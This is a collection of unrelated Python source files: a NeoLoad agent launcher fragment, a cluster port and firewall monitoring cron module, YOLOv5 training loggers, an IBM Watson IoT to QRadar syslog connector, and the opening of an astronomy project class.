truncVersion = truncateVersion( neoloadVersion )
agentLogFilePath = '/root/.neotys/neoload/v%s/logs/agent.log' % truncVersion
starterCmd = 'cd ~/neoload7.xx/ && /usr/bin/java -Xms50m -Xmx100m -Dvertx.disableDnsResolver=true -classpath $HOME/neoload7.xx/.install4j/i4jruntime.jar:$HOME/neoload7.xx/.install4j/launchera03c11da.jar:$HOME/neoload7.xx/bin/*:$HOME/neoload7.xx/lib/crypto/*:$HOME/neoload7.xx/lib/*:$HOME/neoload7.xx/lib/jdbcDrivers/*:$HOME/neoload7.xx/lib/plugins/ext/* install4j.com.neotys.nl.agent.launcher.AgentLauncher_LoadGeneratorAgent start & sleep 30 && free --mega 1>&2'
starterCmd = starterCmd.replace( 'neoload7.xx', 'neoload'+truncVersion )
if neoloadVersion == '7.7':
starterCmd = 'cd ~/neoload7.7/ && /usr/bin/java -Xms50m -Xmx100m -Dvertx.disableDnsResolver=true -classpath $HOME/neoload7.7/.install4j/i4jruntime.jar:$HOME/neoload7.7/.install4j/launchera03c11da.jar:$HOME/neoload7.7/bin/*:$HOME/neoload7.7/lib/crypto/*:$HOME/neoload7.7/lib/*:$HOME/neoload7.7/lib/jdbcDrivers/*:$HOME/neoload7.7/lib/plugins/ext/* install4j.com.neotys.nl.agent.launcher.AgentLauncher_LoadGeneratorAgent start & sleep 30'
elif neoloadVersion == '7.6':
starterCmd = 'cd ~/neoload7.6/ && /usr/bin/java -Dneotys.vista.headless=true -Xmx512m -Dvertx.disableDnsResolver=true -classpath $HOME/neoload7.6/.install4j/i4jruntime.jar:$HOME/neoload7.6/.install4j/launcherc0a362f9.jar:$HOME/neoload7.6/bin/*:$HOME/neoload7.6/lib/crypto/*:$HOME/neoload7.6/lib/*:$HOME/neoload7.6/lib/jdbcDrivers/*:$HOME/neoload7.6/lib/plugins/ext/* install4j.com.neotys.nl.agent.launcher.AgentLauncher_LoadGeneratorAgentService start &'
configuredInstances = []
portMap = {}
if True: # nlWebWanted
# configure the agent properties on each instance
ports = list( range( portRangeStart, portRangeStart+len(startedInstances) ) )
for index, inst in enumerate( startedInstances ):
iid = inst['instanceId']
portMap[iid] = index + portRangeStart
logger.info( 'configuring agents')
returnCodes = configureAgents( startedInstances, ports, timeLimit=600 )
for index, code in enumerate( returnCodes ):
if code==0:
configuredInstances.append( startedInstances[index] )
else:
iid = startedInstances[index].get('instanceId')
logger.info( 'inst %s was not configured properly', iid[0:8] )
# start the agent on each instance
stepStatuses = tellInstances.tellInstances( configuredInstances, command=starterCmd,
resultsLogFilePath=outDataDir +'/startAgents.jlog',
timeLimit=30*60,
knownHostsOnly=True
)
logger.debug( 'starter statuses: %s', stepStatuses )
# make a list of instances where the agent was started
goodIids = []
for status in stepStatuses:
if isinstance( status['status'], int) and status['status'] == 0:
goodIids.append( status['instanceId'])
else:
logger.warning( 'could not start agent on %s', status['instanceId'][0:8] )
#COULD check bound ports again here
#COULD download logs from all installed instances rather than just good-started instances
goodInstances = [inst for inst in startedInstances if inst['instanceId'] in goodIids ]
if goodInstances:
time.sleep( 60 )
# download the agent.log file from each instance
stepStatuses = tellInstances.tellInstances( goodInstances,
download=agentLogFilePath, downloadDestDir=outDataDir +'/agentLogs',
timeLimit=30*60,
knownHostsOnly=True
)
logger.debug( 'download statuses: %s', stepStatuses )
# make a list of instances where the log file was downloaded and agent start is verified
goodIids = []
for status in stepStatuses:
if isinstance( status['status'], int) and status['status'] == 0:
iid = status['instanceId']
logFilePath = os.path.join( outDataDir, 'agentLogs', iid, 'agent.log' )
try:
with open( logFilePath, 'r' ) as logFile:
contents = logFile.read().rstrip()
if ' ERROR ' in contents:
lastLine = contents.split('\n')[-1].strip()
logger.warning( 'log for %s indicates error "%s"', iid[0:8], lastLine )
elif ': Agent started' not in contents:
logger.warning( 'log for %s says it did not start', iid[0:8] )
else:
goodIids.append( iid )
except Exception as exc:
logger.warning( 'exception reading log (%s) %s', type(exc), exc )
else:
logger.warning( 'could not download log from %s', status['instanceId'][0:8] )
goodInstances = [inst for inst in goodInstances if inst['instanceId'] in goodIids ]
with open( outDataDir + '/startedAgents.json','w' ) as outFile:
json.dump( goodInstances, outFile, indent=2 )
# plot map of workers
if os.path.isfile( outDataDir +'/startedAgents.json' ):
rc2 = subprocess.call( [scriptDirPath()+'/plotAgentMap.py', '--dataDirPath', outDataDir],
stdout=subprocess.DEVNULL )
if rc2:
logger.warning( 'plotAgentMap exited with returnCode %d', rc2 )
# start the ssh port-forwarding
logger.info( 'would forward ports for %d instances', len(goodInstances) )
forwarders = startForwarders.startForwarders( goodInstances,
forwarderHost=forwarderHost,
portMap=portMap,
portRangeStart=portRangeStart, maxPort=portRangeStart+100,
forwardingCsvFilePath=outDataDir+'/agentForwarding.csv'
)
if len( forwarders ) < len( goodInstances ):
logger.warning( 'some instances could not be forwarded to' )
logger.debug( 'forwarders: %s', forwarders )
#TODO get iids only for successfully forwarded agents
forwardedIids = [inst['instanceId'] for inst in goodInstances ]
unusableIids = list( set(launchedIids) - set( forwardedIids) )
if unusableIids:
logger.debug( 'terminating %d unusable instances', len(unusableIids) )
ncs.terminateInstances( authToken, unusableIids )
unusableInstances = [inst for inst in launchedInstances \
if inst['instanceId'] in unusableIids]
purgeHostKeys( unusableInstances )
if launchedInstances:
print( 'when you want to terminate these instances, use %s %s "%s"'
% (sys.executable, scriptDirPath()+'/terminateAgents.py', outDataDir))
sys.exit( rc )
except KeyboardInterrupt:
logger.warning( 'an interuption occurred')
|
CronTools.py
|
# coding: utf-8
from src.orm.SqlStrunct import Monitor
import multiprocessing
from src.orm.SqlUtil import SqlUtil
from src.orm.SqlStrunct import Cluster
import threading
from Config import Config
import time
import telnetlib
from datetime import datetime
from src.tools.DateTools import DateTools
import random
conf = Config()
# monitor cron
class CronMonitor(object):
queue = multiprocessing.Queue()
su = SqlUtil()
def __new__(cls, *args, **kwargs):
if not hasattr(cls, "_init"):
cls._init = object.__new__(cls)
return cls._init
def insert_monitor(self, monitor):
if not isinstance(monitor, Monitor):
print "Error: monitor 必须是Monitor"
self.queue.put(monitor)
# cron进程执行方法
def cron_exec(self):
while True:
obj = self.queue.get()
if not isinstance(obj, Monitor):
print "Error, %s" % obj
self.su.insert_one_sql(obj)
# 启动进程
@staticmethod
def start():
ct = CronMonitor()
multiprocessing.Process(target=ct.cron_exec).start()
# cluster cron
class CronCluster(object):
su = SqlUtil()
def __new__(cls, *args, **kwargs):
if not hasattr(cls, "_init"):
cls._init = object.__new__(cls)
return cls._init
# 执行检查端口
@staticmethod
def exec_check_port(cluster):
if not isinstance(cluster, Cluster):
return
try:
telnetlib.Telnet(host=cluster.ip, port=cluster.port)
cluster.status = True
except Exception as e:
cluster.status = False
cluster.detail = e.message
cluster.last_update = DateTools.date_format(datetime.now())
su = CronCluster.su
su.update_cluster_sql(cluster)
# 检查端口
@staticmethod
def check_port():
try:
su = CronCluster.su
clusters, err = su.get_cluster()
if err:
print err
return
for cluster in clusters:
enable = False
while not enable:
if threading.activeCount() < 20:
threading.Thread(target=CronCluster.exec_check_port, args=(cluster,)).start()
enable = True
else:
time.sleep(5)
except Exception as e:
print e.message
# 执行防火墙检查端口
@staticmethod
def exec_check_firewalld(cluster):
if not isinstance(cluster, Cluster):
return
# 如果是全开放,则退出
if cluster.normal_ports == "ALL":
return
# 定义monitor类
monitor = Monitor()
monitor.status = True
monitor.detail = "%s" % cluster.ip
monitor.cluster = cluster.name
monitor.time = DateTools.date_format(datetime.now())
monitor.type = "firewalld"
# 定义检查端口
normal_ports = []
out_ports = cluster.normal_ports.split(",")
for port in out_ports:
if '-' in port:
start, end = port.split('-')
normal_ports.append(range(int(start), int(end) + 1))
else:
normal_ports.append(int(port))
ports = [22, 80, 443, 7180, 8088, 8888, 11000, 10000, 8998,
random.randint(15000, 65535), random.randint(15000, 65535), random.randint(15000, 65535)]
[ports.remove(port) for port in normal_ports if port in ports]
for port in ports:
try:
telnetlib.Telnet(host=cluster.ip, port=port)
if monitor.status:
monitor.status = False
monitor.detail += u"%s 可以正常连接,与预期状态不符合" % port
except Exception:
pass
monitor.detail += u"非法端口检查正常" if monitor.status else u"非法端口检查不正常"
CronCluster.su.insert_one_sql(monitor)
# 检查防火墙端口
@staticmethod
def check_firewalld():
try:
su = CronCluster.su
clusters, err = su.get_cluster()
if err:
print err
return
for cluster in clusters:
enable = False
while not enable:
if threading.activeCount() < 20:
threading.Thread(target=CronCluster.exec_check_firewalld, args=(cluster,)).start()
enable = True
else:
time.sleep(5)
except Exception as e:
print e.message
# cron进程执行方法
@staticmethod
def cron_exec():
while True:
threading.Thread(target=CronCluster.check_port).start()
threading.Thread(target=CronCluster.check_firewalld).start()
time.sleep(conf.monitor_frequency * 60)
# 启动进程
@staticmethod
def start():
multiprocessing.Process(target=CronCluster.cron_exec).start()
# Data delete
class CronDataExpire(object):
su = SqlUtil()
def __new__(cls, *args, **kwargs):
if not hasattr(cls, "_init"):
cls._init = object.__new__(cls)
return cls._init
# 执行检查端口
@staticmethod
def data_expire_delete():
data_keep = conf.data_keep
expire_time = DateTools.update_time(datetime.now(), days=data_keep, add=False)
CronDataExpire.su.delete_expire_monitor_data(expire_time)
# cron进程执行方法
@staticmethod
def cron_exec():
while True:
CronDataExpire.data_expire_delete()
time.sleep(60 * 60)
# 启动进程
@staticmethod
def start():
multiprocessing.Process(target=CronDataExpire.cron_exec).start()
|
__init__.py
|
# YOLOv5 🚀 by Ultralytics, GPL-3.0 license
"""
Logging utils
"""
import os
import warnings
from threading import Thread
import pkg_resources as pkg
import torch
from torch.utils.tensorboard import SummaryWriter
from utils.general import colorstr, emojis
from utils.loggers.wandb.wandb_utils import WandbLogger
from utils.plots import plot_images, plot_results
from utils.torch_utils import de_parallel
LOGGERS = ('csv', 'tb', 'wandb') # text-file, TensorBoard, Weights & Biases
RANK = int(os.getenv('RANK', -1))
try:
import wandb
assert hasattr(wandb, '__version__') # verify package import not local dir
if pkg.parse_version(wandb.__version__) >= pkg.parse_version('0.12.2') and RANK in [0, -1]:
wandb_login_success = wandb.login(timeout=30)
if not wandb_login_success:
wandb = None
except (ImportError, AssertionError):
wandb = None
class Loggers():
# YOLOv5 Loggers class
def __init__(self, save_dir=None, weights=None, opt=None, hyp=None, logger=None, include=LOGGERS):
self.save_dir = save_dir
self.weights = weights
self.opt = opt
self.hyp = hyp
self.logger = logger # for printing results to console
self.include = include
self.keys = ['train/box_loss', 'train/obj_loss', 'train/cls_loss', # train loss
'metrics/precision', 'metrics/recall', 'metrics/mAP_0.5', 'metrics/mAP_0.5:0.95', # metrics
'val/box_loss', 'val/obj_loss', 'val/cls_loss', # val loss
'x/lr0', 'x/lr1', 'x/lr2'] # params
for k in LOGGERS:
setattr(self, k, None) # init empty logger dictionary
self.csv = True # always log to csv
# Message
if not wandb:
prefix = colorstr('Weights & Biases: ')
s = f"{prefix}run 'pip install wandb' to automatically track and visualize YOLOv5 🚀 runs (RECOMMENDED)"
print(emojis(s))
# TensorBoard
s = self.save_dir
if 'tb' in self.include and not self.opt.evolve:
prefix = colorstr('TensorBoard: ')
self.logger.info(f"{prefix}Start with 'tensorboard --logdir {s.parent}', view at http://localhost:6006/")
self.tb = SummaryWriter(str(s))
# W&B
if wandb and 'wandb' in self.include:
wandb_artifact_resume = isinstance(self.opt.resume, str) and self.opt.resume.startswith('wandb-artifact://')
run_id = torch.load(self.weights).get('wandb_id') if self.opt.resume and not wandb_artifact_resume else None
self.opt.hyp = self.hyp # add hyperparameters
self.wandb = WandbLogger(self.opt, run_id)
else:
self.wandb = None
def on_pretrain_routine_end(self):
# Callback runs on pre-train routine end
paths = self.save_dir.glob('*labels*.jpg') # training labels
if self.wandb:
self.wandb.log({"Labels": [wandb.Image(str(x), caption=x.name) for x in paths]})
def on_train_batch_end(self, ni, model, imgs, targets, paths, plots, sync_bn):
# Callback runs on train batch end
if plots:
if ni == 0:
if not sync_bn: # tb.add_graph() --sync known issue https://github.com/ultralytics/yolov5/issues/3754
with warnings.catch_warnings():
warnings.simplefilter('ignore') # suppress jit trace warning
self.tb.add_graph(torch.jit.trace(de_parallel(model), imgs[0:1], strict=False), [])
if ni < 3:
f = self.save_dir / f'train_batch{ni}.jpg' # filename
Thread(target=plot_images, args=(imgs, targets, paths, f), daemon=True).start()
if self.wandb and ni == 10:
files = sorted(self.save_dir.glob('train*.jpg'))
self.wandb.log({'Mosaics': [wandb.Image(str(f), caption=f.name) for f in files if f.exists()]})
def on_train_epoch_end(self, epoch):
# Callback runs on train epoch end
if self.wandb:
self.wandb.current_epoch = epoch + 1
def on_val_image_end(self, pred, predn, path, names, im):
# Callback runs on val image end
if self.wandb:
self.wandb.val_one_image(pred, predn, path, names, im)
def on_val_end(self):
# Callback runs on val end
if self.wandb:
files = sorted(self.save_dir.glob('val*.jpg'))
self.wandb.log({"Validation": [wandb.Image(str(f), caption=f.name) for f in files]})
def on_fit_epoch_end(self, vals, epoch, best_fitness, fi):
# Callback runs at the end of each fit (train+val) epoch
x = {k: v for k, v in zip(self.keys, vals)} # dict
if self.csv:
file = self.save_dir / 'results.csv'
n = len(x) + 1 # number of cols
s = '' if file.exists() else (('%20s,' * n % tuple(['epoch'] + self.keys)).rstrip(',') + '\n') # add header
with open(file, 'a') as f:
f.write(s + ('%20.5g,' * n % tuple([epoch] + vals)).rstrip(',') + '\n')
if self.tb:
for k, v in x.items():
self.tb.add_scalar(k, v, epoch)
if self.wandb:
self.wandb.log(x)
self.wandb.end_epoch(best_result=best_fitness == fi)
def on_model_save(self, last, epoch, final_epoch, best_fitness, fi):
# Callback runs on model save event
if self.wandb:
if ((epoch + 1) % self.opt.save_period == 0 and not final_epoch) and self.opt.save_period != -1:
self.wandb.log_model(last.parent, self.opt, epoch, fi, best_model=best_fitness == fi)
def on_train_end(self, last, best, plots, epoch):
# Callback runs on training end
if plots:
plot_results(file=self.save_dir / 'results.csv') # save results.png
files = ['results.png', 'confusion_matrix.png', *[f'{x}_curve.png' for x in ('F1', 'PR', 'P', 'R')]]
files = [(self.save_dir / f) for f in files if (self.save_dir / f).exists()] # filter
if self.tb:
import cv2
for f in files:
self.tb.add_image(f.stem, cv2.imread(str(f))[..., ::-1], epoch, dataformats='HWC')
if self.wandb:
self.wandb.log({"Results": [wandb.Image(str(f), caption=f.name) for f in files]})
# Calling wandb.log. TODO: Refactor this into WandbLogger.log_model
if not self.opt.evolve:
wandb.log_artifact(str(best if best.exists() else last), type='model',
name='run_' + self.wandb.wandb_run.id + '_model',
aliases=['latest', 'best', 'stripped'])
self.wandb.finish_run()
else:
self.wandb.finish_run()
self.wandb = WandbLogger(self.opt)
|
getwiotpdata.py
|
# *****************************************************************************
# Copyright (c) 2018 IBM Corporation and other Contributors.
#
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the Eclipse Public License v1.0
# which accompanies this distribution, and is available at
# http://www.eclipse.org/legal/epl-v10.html
#
# Contributors:
# Ranjan Dasgupta - Initial drop for Alpha release
#
# *****************************************************************************
#
# Connector application used for inegrating Watson IoT Platform with QRadar
#
import os
import logging
import logging.handlers
from datetime import datetime
import time
import threading
from threading import Thread
from threading import Lock
import sys
import json
import re
import ibmiotf
import ibmiotf.application
import ConfigParser
import signal
import socket
# SYSLOG setup
# Application names -
APPNAMECONNECTION = "wiotp_qradar:1.0:Connection "
# APPNAMEDEVICEMGMT = "wiotp_qradar:1.0:DevMgmt "
sysLogger = logging.getLogger('WIOTPSYSLOG')
# Setup Application logger to console
applogger = logging.getLogger('qradar-connector')
applogger.setLevel(logging.DEBUG)
conlogger = logging.StreamHandler()
conlogger.setLevel(logging.DEBUG)
applogger.addHandler(conlogger)
# Variables to control WIoTP API invocation
#
# Variables used to control time period in GET /connection/logs API
# Time periods ar in ISO8601 format
curTime = time.gmtime()
lastTime = curTime
curISOTime = time.strftime("%Y-%m-%dT%H:%M:%S", curTime)
lastISOTime = curISOTime
# compile regular expressions
authREObj = re.compile(r'(.*): ClientID=\S(.*?)\S, ClientIP=(.*)')
connREObj = re.compile(r'^Closed\sconnection\sfrom\s(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\.(.*)')
genrREObj = re.compile(r'(.*)ClientIP=(.*)')
# compile regex for log file line
logfREObj = re.compile(r'^(.*?) LOGMSG=(.*$)')
systemIP = '127.0.0.1'
test_mode = 0
fetchInit = 0
configData = {}
startLoop = 0
stopLoop = 0
threadStopped = 0
# Signal handler
def signalHandler(sig, frame):
global stopLoop
stopLoop = 1
applogger.info("Exit program on SIGINT")
sys.exit(0)
#
# Get local IP address
def getLocalIP():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.connect(('8.8.8.8', 1))
IP = s.getsockname()[0]
except:
IP = '127.0.0.1'
finally:
s.close()
return IP
#
# Function to process device log messages and generate syslog events
#
def processLogEvent(clientId, log):
global test_mode
global systemIP
# This function parses log event and generate syslog event.
# Log event from WIoTP is in JSON format. Example of a typical log event:
# {"timestamp": "2018-02-28T20:02:50.585Z", "message": "Token auth succeeded: ClientID='d:li0f0v:NXPDev:testSub', ClientIP=32.97.110.54"}
# SYSLOG Event format:
# <timestamp> <localip> <APPNAME>: devType=<devType> devId=<devId> Message=<Raw log message>
timestamp = log["timestamp"]
msg = log["message"]
if test_mode == 1:
cT = time.gmtime()
tstamp = time.strftime("%b %d %H:%M:%S", cT)
syslog_header = "%s %s " % (tstamp, systemIP)
else:
syslog_header = "%s %s " % (timestamp, systemIP)
headMsg = syslog_header + APPNAMECONNECTION
# Parse authentication messages
mObj = authREObj.match(msg)
if mObj:
message = mObj.group(1)
clientId = mObj.group(2)
IP = mObj.group(3)
event = "AuthSucceeded"
if "failed" in message:
event = "AuthFailed"
eventMsg = "%s source=%s event=%s clientID=%s Message=%s" % (headMsg, IP, event, clientId, message)
applogger.debug(eventMsg)
sysLogger.info(eventMsg)
return
# Parse connection closed messages
mObj = connREObj.match(msg)
if mObj:
message = mObj.group(2)
IP = mObj.group(1)
event = "ClosedNormal"
if "by the client" in message:
state = "ClosedByClient"
if "not authorized" in message:
event = "OperationUnauthorized"
eventMsg = "%s source=%s event=%s clientID=%s Message=%s" % (headMsg, IP, event, clientId, message)
applogger.debug(eventMsg)
sysLogger.info(eventMsg)
return
# Process generic log
# check if ClientIP is specified in message
event = "NA"
IP = "NA"
mObj = genrREObj.match(msg)
if mObj:
IP = mObj.group(2)
eventMsg = "%s source=%s event=%s clientID=%s Message=%s" % (headMsg, IP, event, clientId, msg)
applogger.debug(eventMsg)
sysLogger.info(eventMsg)
#
# Get all device data from Watson IoT Platform
#
def getDevices(client, device_limit, log_limit):
# applogger.info("Start a new pool cycle ...")
_getPageOfDevices(client, device_limit, log_limit, None )
#
# Get device data in chunks
#
def _getPageOfDevices(client, device_limit, log_limit, bookmark):
global lastISOTime
global curISOTime
deviceList = client.api.getDevices(parameters = {"_limit": device_limit, "_bookmark": bookmark, "_sort": "typeId,deviceId"})
resultArray = deviceList['results']
applogger.info("Process connection logs of " + str(len(resultArray)) + " devices")
for device in resultArray:
if "metadata" not in device:
device["metadata"] = {}
typeId = device["typeId"]
deviceId = device["deviceId"]
clientId = device["clientId"]
# applogger.debug("ClientID=" + clientId)
try:
# get logs for the device
if log_limit == 0:
applogger.debug("clientID:" + clientId + " from:" + lastISOTime + " to:" + curISOTime);
logresults = client.api.getConnectionLogs({"typeId":typeId, "deviceId":deviceId, "fromTime": lastISOTime, "toTime": curISOTime})
else:
if log_limit == -1:
logresults = client.api.getConnectionLogs({"typeId":typeId, "deviceId":deviceId})
else:
logresults = client.api.getConnectionLogs({"typeId":typeId, "deviceId":deviceId, "_limit": log_limit})
logMsgCount = 0
for log in logresults:
processLogEvent(clientId, log)
applogger.debug(clientId + " LOGMSG=" + json.dumps(log))
logMsgCount += 1
if logMsgCount > 0:
applogger.info("ClientID:" + clientId + " Total events:" + str(logMsgCount))
except Exception as e:
applogger.error(str(e))
# Next page
if "bookmark" in deviceList:
bookmark = deviceList["bookmark"]
_getPageOfDevices(client, device_limit, log_limit, bookmark)
#
# Get device data and log events
#
def getEventFromAPI(client, device_limit, log_limit):
try:
getDevices(client, device_limit, log_limit)
except ibmiotf.APIException as e:
applogger.error(e.httpCode)
applogger.error(str(e))
return
except Exception as e:
applogger.info(str(e))
return
#
# Get events from log file
# Log file should be in the following format:
# <ClientID> LOGMSG=<logMessage>
#
def getEventsFromLogFile(logf):
# read log file and process log event
with open(logf, "r") as f:
for line in f:
applogger.debug(line)
lObj = logfREObj.match(line)
if lObj:
clientId = lObj.group(1)
log = lObj.group(2)
jslog = json.loads(log)
processLogEvent(clientId, jslog)
#
# Pooling function to perodically invoke REST API to get device logs and data from WIoTP
#
def getDataAndProcess():
global test_mode
global fetchInit
global configData
global startLoop
global stopLoop
global threadStopped
global lastISOTime
global curISOTime
cycle = 0
loop = 0
test_mode = configData['test_mode']
nloop = int(configData['cycles'])
device_limit = int(configData['device_fetch_limit'])
log_limit = int(configData['log_fetch_limit'])
interval = int(configData['log_fetch_interval'])
test_log = configData['test_log']
# Set current time in ISO8601 - needed for log fetch API
curTime = time.gmtime()
curISOTime = time.strftime("%Y-%m-%dT%H:%M:%S", curTime)
applogger.info("Current time: " + curISOTime + "\n")
# Get API client
config = "application.cfg"
client = None
options = ibmiotf.application.ParseConfigFile(config)
try:
client = ibmiotf.application.Client(options)
client.logger.setLevel(logging.INFO)
except Exception as e:
applogger.error(str(e))
return
while True:
if startLoop == 1:
loop += 1
# set current time
curTime = time.gmtime()
curISOTime = time.strftime("%Y-%m-%dT%H:%M:%S", curTime)
if nloop == 0:
applogger.info("WIoTP Log Fetch cycle [{0}]: Time From:{1} To:{2}".format(str(loop),lastISOTime, curISOTime))
else:
applogger.info("WIoTP Log Fetch cycle [{0}] of [{1}]: Time From:{2} To:{3}".format(str(loop),str(nloop),lastISOTime, curISOTime))
if len(test_log) > 0 and test_mode == 1:
# Get log from log file
getEventsFromLogFile(test_log)
else:
if fetchInit == 0 and log_limit == 0:
# get all old logs when connecting for the first time
getEventFromAPI(client,device_limit,-1)
fetchInit = 1
else:
getEventFromAPI(client,device_limit,log_limit)
# set last time
lastISOTime = curISOTime
# check for test cycle
if nloop > 0 and loop == nloop:
break
time.sleep(int(interval))
if stopLoop == 1:
break
applogger.info("STOP and EXIT application \n")
threadStopped = 1
sys.exit(0)
#
# Set startLoop variable so that thread can start processing data
#
def start_thread():
global startLoop
global stopLoop
print("Starting Application")
stopLoop = 0
startLoop = 1
#
# Set startLoop variable so that thread can start processing data
#
def stop_thread():
global startLoop
global stopLoop
print("Stopping Application")
stopLoop = 1
startLoop = 0
# Configure syslog server and spawn thread to get connection logs from WIoTP and generate
# syslog events
def get_wiotp_data():
global sysLogger
global systemIP
global configData
# Set up signal handler
signal.signal(signal.SIGINT, signalHandler)
applogger.info("Start qradar-connector")
# Read configuration file to read qradar syslog server host IP and Port
cwd = os.getcwd()
configpath = cwd + "/application.cfg"
# Get configuration data
config = ConfigParser.ConfigParser()
config.read(configpath)
# SYSLOG server address and port
syslog_server_address = config.get("qradar-syslog-server", "hostip")
syslog_server_port = config.getint("qradar-syslog-server", "port")
applogger.info("syslog_server_address: " + syslog_server_address )
applogger.info("syslog_server_port: " + str(syslog_server_port) )
# read parameters used for invoking WIoTP API calls and processing data
configData = {}
# Check for test mode
configData['test_mode'] = config.get("qradar-connector", "replay-log-file")
configData['test_log'] = config.get("qradar-connector", "log-file-name")
# Set number of cycles - default is 0 (loop for ever)
configData['cycles'] = config.getint("qradar-connector", "cycles")
# Chunk limit for getting device data
configData['device_fetch_limit'] = config.getint("qradar-connector", "device-fetch-limit")
# Log fetch strategy
# 0 (use time period), 1 (use limit), -1 (get all)
configData['log_fetch_limit'] = config.getint("qradar-connector", "log-fetch-limit")
# Log fetch pooling interval in seconds
configData['log_fetch_interval'] = config.getint("qradar-connector", "log-fetch-interval")
# Log Level - default INFO
configData['level'] = config.get("qradar-connector", "level")
systemIP = getLocalIP()
# Set log level
applogger.removeHandler(conlogger)
conlogger.setLevel(configData['level'])
applogger.addHandler(conlogger)
applogger.debug("Configuration Data:")
applogger.debug(json.dumps(configData, indent=4))
# Set Syslog handler
sysLogger.setLevel(logging.INFO)
syslog_handler = logging.handlers.SysLogHandler( address=(syslog_server_address, syslog_server_port), facility=logging.handlers.SysLogHandler.LOG_LOCAL1)
sysLogger.addHandler(syslog_handler)
# Start thread to process data
thread = Thread(target = getDataAndProcess)
thread.start()
if __name__ == '__main__':
startLoop = 1
get_wiotp_data()
|
Admit.py
|
"""**Project** --- ADMIT project.
------------------------------
This module defines the Admit project class.
"""
# system imports
import time
import xml.etree.cElementTree as et
import fnmatch, os, os.path
import zipfile
import copy
import numpy as np
import threading
import sys
import errno
import datetime
import webbrowser
import ast
import textwrap
import traceback
import subprocess
#import Queue
#from multiprocessing.dummy import Pool as ThreadPool
import signal
# ADMIT imports
import admit
import admit.version
import admit.xmlio.Parser as Parser
import admit.Summary as Summary
import admit.util.utils as utils
import admit.util.AdmitHTTP
import admit.util.PlotControl as PlotControl
from admit.xmlio.DtdReader import DtdReader
import admit.util.bdp_types as bt
from admit.util.AdmitLogging import AdmitLogging as logging
from admit.util import LineData
# ==============================================================================
class Admit(object):
"""
Container for an ADMIT project. The project is normally based on one
single FITS cube (in some cases two, where the ingest stage needs a
primary beam to correct the science cube with), although this is not
a restriction to ADMIT.
A FITS cube results in an ADMIT directory, within which you will
find an admit.xml file describing the project, it's data products (BDP's)
and the AT's (tasks) that generated the BDP's.
If input file/directory are given or admit.xml is located in the current
directory then they are loaded into the class, else a new (empty) class is
instantiated.
Parameters
----------
baseDir : str
Base directory for XML files (the "ADMIT directory").
name : str
Alias name.
basefile : str
Base XML file name (default: admit.xml).
create : bool
Whether to create any needed directories.
dataserver : bool
Whether to start the data browser server.
loglevel : int
The integer log level from the Python *logging* module. One of:
- logging.CRITICAL = 50
- logging.ERROR = 40
- logging.WARNING = 30
- logging.INFO = 20
- logging.DEBUG = 10
Default is logging.INFO.
commit : bool, optional
Whether to commit XML-backed flows immediately; default is ``True``.
Set to ``True`` if the flow will *not* be reconstructed (as in a recipe
script) before use; this is usually the case for interactive mode. Set
to ``False`` in (most) scripts, which reconstruct the flow each time.
Attributes
----------
baseDir : str
Base directory for XML files (the "ADMIT directory").
Guaranteed to end in os.sep.
baseFile : str
Base XML file name, usually admit.xml.
currDir : str
Current working directory (at construction).
fm : FlowManager
Project flow manager instance.
new : bool
Whether the project is new or constructed from an existing XML file.
pm : ProjectManager
Project manager instance.
pmode : int
Plotting mode.
ptype : int
Plotting type.
count : int
Flow counter how many times the flow has been run (stored in userData)
project_id : int
Static project identification number
summaryData : instance of admit.Summary
AT summary data
userData : dict
Additional, user-defined data.
_data_browser_port : int
Port number that the localhost http server for the data
browser (aka data GUI) will use. This attribute is set
by the operating system.
_data_server : bool
Whether to start the data browser server.
_server : HTTP server
Data HTTP server.
Notes
-----
.. todo::
1. in the current implementation every directory, admit or not-admit, can
be made an admit directory (i.e. contain a root admit.xml)
2. we really don't need a basefile= in the argument list
"""
project_id = 0 # Class static project ID counter.
loginit = False # whether or not the logger has been innitialized
def __init__(self, baseDir=None, name='none', basefile=None, create=True, dataserver=False,
loglevel=logging.INFO, commit=True):
#
# IMPORTANT note for dtd's: if you add items for admit.xml here,
# don't forget to edit dtdGenerator.py and run bin/dtdGenerator
#
# baseDir : should be a directory, always needed
# name : some ID, deprecate?
# basefile : should be admit.xml, why change it?
# create : create any new directory that's needed
# global ID
# [KPR] This doesn't actually work as the ID is "global" only to
# individual scripts. The ProjectManager overrides it.
# @todo can we remove this?
self.project_id = Admit.project_id
Admit.project_id = Admit.project_id + 1
# Project manager instance.
self.pm = admit.Manager()
# Timing info
self.dt = utils.Dtime("ADMITrun")
# default to zero to let OS pick an open port
self._data_browser_port = 0
# start the server for the data browser or not
self._data_server = dataserver
# old admit2 things to keep it working
self.name = name
self.plotparams()
self.loglevel = loglevel
# new Admit things
self.userData = {} # user added data, anything can go in here; use get/set
self.summaryData = Summary.Summary() # summary added data, the my_AT.summary() will provide these
self._fm0 = None # flow manager as read from XML
self.fm = admit.Flow() # flow manager
self.pm = admit.Manager() # project manager
self.new = False # is this a new admit object or are we building it from an xml
self.astale = 0 # export hack (will be True if lightweight tar file is built)
self.count = 0 # keep track how many times this admit has been run
self._server = None # data HTTP server
# location information
self.baseDir = None # base directory for xml files ('the admit directory')
self.baseFile = None # base file name, usually admit.xml
self.currDir = os.getcwd() # remember where we started (deprecate, we don't need it now)
#self.queue = Queue.Queue()
#self.pool = ThreadPool(1)
if baseDir != None:
if baseDir[0] == os.sep:
baseDir = os.path.abspath(baseDir)
#print "Absolute ADMIT"
else:
baseDir = os.path.abspath(self.currDir + os.sep + baseDir)
#print "Relative ADMIT"
else:
baseDir = os.path.abspath(self.currDir + os.sep)
#print "Local ADMIT"
#print "ADMIT(%s): CWD=%s" % (baseDir, self.currDir)
print "ADMIT basedir = %s" % (baseDir)
print "ADMIT root = %s" % (utils.admit_root())
print "ADMIT version = %s" % (self.version())
self._loggername = baseDir.replace("/", ".")
if self._loggername.startswith("."):
self._loggername = self._loggername[1:]
# look for admit.xml or admit.zip files
if os.path.exists(baseDir): # does basedir even exist yet
if os.path.isfile(baseDir): # basedir is actually a file (should we allow this?)
loc = baseDir.rfind(os.sep)
# separate out the base directory and the base file
if loc == -1:
self.baseDir = ""
self.baseFile = baseDir
else:
self.basedir = baseDir[:loc+1]
self.baseFile = baseDir[loc+1:]
elif os.path.isdir(baseDir): # basedir is a directory
if baseDir[-1] == os.sep:
self.baseDir = baseDir
else:
self.baseDir = baseDir + os.sep
self.baseFile = "admit.xml" if basefile == None else basefile
